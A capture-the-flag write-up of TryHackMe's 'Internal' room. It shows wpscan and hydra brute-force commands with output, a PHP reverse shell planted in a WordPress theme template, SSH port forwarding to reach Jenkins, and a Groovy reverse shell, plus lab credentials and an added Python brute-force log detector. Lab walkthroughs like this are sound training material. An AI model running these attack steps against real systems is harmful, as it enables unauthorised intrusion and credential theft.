CHALLENGE OVERVIEW
- CTF Creator: TheMayor
- Link: https://tryhackme.com/room/internal
- Difficulty: Hard
- Target: Root/User flags
- Highlight: Enumerating a WordPress site with wpscan
- Tools used: pentest.ws, hydra, nmap, dirb, linpeas, ssh with port forwarding
- Tags: CTF, security, accessible, pentest, blackbox
BACKGROUND

This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.
We will have to discover ports and services running on the server with our standard pentesting tools, an nmap scan and a dirb scan. We also don’t have any inside information about the backend of the target machine.
Let’s get started!

We’ll be testing out the website pentest.ws during today’s video walkthrough.
It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT (vulnerability assessment and penetration testing) reports.
At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.
ENUMERATION/RECON

sudo nmap -A -oX nmap.txt $targetIP -p-
Today we are exporting our nmap results in XML format (-oX) so that we can upload them to pentest.ws and have the site automatically parse our findings.
dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php
USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS
Let’s use wpscan to discover the admin’s email and password for WordPress.
wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.
wpscan --url 10.10.61.252/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!
admin:my2boys
Now we can log into WordPress and look for a place to upload a revshell.
INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP

We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.
If you want to learn more about ezpzshell, check out my previous blog post:
👉 Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation
ezpz 10.6.2.23 8888 php
(ezpzshell also automatically starts a listener)

After copying the payload to 404.php, we make sure it is saved and then trigger the payload:
http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php
And if everything is set up correctly, we will catch the revshell with ezpz as user www-data.

STABILIZE THE SHELL

The following command will stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS
We discover a txt file with credentials:
cat wp-save.txt
Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
Let’s try switching users to aubreanna with the password given in wp-save.txt.
su aubreanna
We are in as user aubreanna and immediately find the user flag.
aubreanna@internal:~$ cat user.txt
THM{i—------omitted--------1}
MORE ENUMERATION – DISCOVER A JENKINS SERVICE
cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
SET UP PORT FORWARDING VIA SSH LOGIN

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.

BRUTE-FORCE THE LOGIN

hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'
The http-post-form payload on this command has three colon-separated parts:
- the header, i.e. the path the login form posts to (/j_acegi_security_check)
- the request body, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable filled from the password wordlist
- the error message that the website will return with a wrong password (Invalid username or password), which hydra uses to tell a failed attempt from a hit
Using Burp Suite or developer mode in Firefox will allow us to extract these strings and modify them into our final hydra payload.
Output:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10
Credentials found! admin:spongebob
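Both password attacks in this write-up, the wpscan run against wp-login.php and the hydra run against /j_acegi_security_check, leave the same footprint on the server: a burst of POSTs to one login endpoint from one source (hydra reported ~396 tries/min). As an added example that is not part of the original post, this Python script flags that pattern in constructed Apache-style access-log lines; the IPs, timestamps, window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Login endpoints seen in this write-up: the WordPress form wpscan hammered
# and the Jenkins form hydra hammered through the SSH tunnel.
LOGIN_PATHS = {"/blog/wp-login.php", "/j_acegi_security_check"}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Split a combined-format access-log line into (ip, time, method, path, status)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?")[0], int(status)


def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=20):
    """Return {(ip, path): peak_count} for sources that POST to a login
    endpoint at least `threshold` times inside any sliding `window`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            attempts[(rec[0], rec[3])].append(rec[1])
    alerts = {}
    for key, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = max(alerts.get(key, 0), end - start + 1)
    return alerts


def _line(ip, second, path, status):
    return f'{ip} - - [06/Feb/2023:08:57:{second:02d} +0000] "POST {path} HTTP/1.1" {status} 0'


# Constructed sample (assumption, not captured from the box): one source firing
# ~2 POSTs/s at the Jenkins form, plus a user who mistyped a WordPress password twice.
SAMPLE_LOG = (
    [_line("10.6.2.23", s // 2, "/j_acegi_security_check", 302) for s in range(40)]
    + [_line("10.0.0.5", 5, "/blog/wp-login.php", st) for st in (200, 200, 302)]
    + ['10.0.0.5 - - [06/Feb/2023:08:57:30 +0000] "GET /blog/ HTTP/1.1" 200 9120']
)
```

Running detect_bruteforce(SAMPLE_LOG) flags only the Jenkins source; the legitimate user’s three attempts stay below the threshold.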
ENUMERATING JENKINS AS ADMIN
We’ll use the script console on Jenkins to spawn another revshell using the Groovy scripting language.
We’ll use ezpzshell and choose the Java code, because Groovy is built on Java. This time when we catch it, we will be user jenkins.
Manually enumerating through the file system, we stumble across a note.txt. Let’s check out the contents:
cat note.txt
Output:
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.
root:tr0ub13guM!@#123
Bingo! We found root user credentials!
SWITCH USERS TO ROOT
su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}

FINAL THOUGHTS

I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.
I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.
However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.
Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.
👉 Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.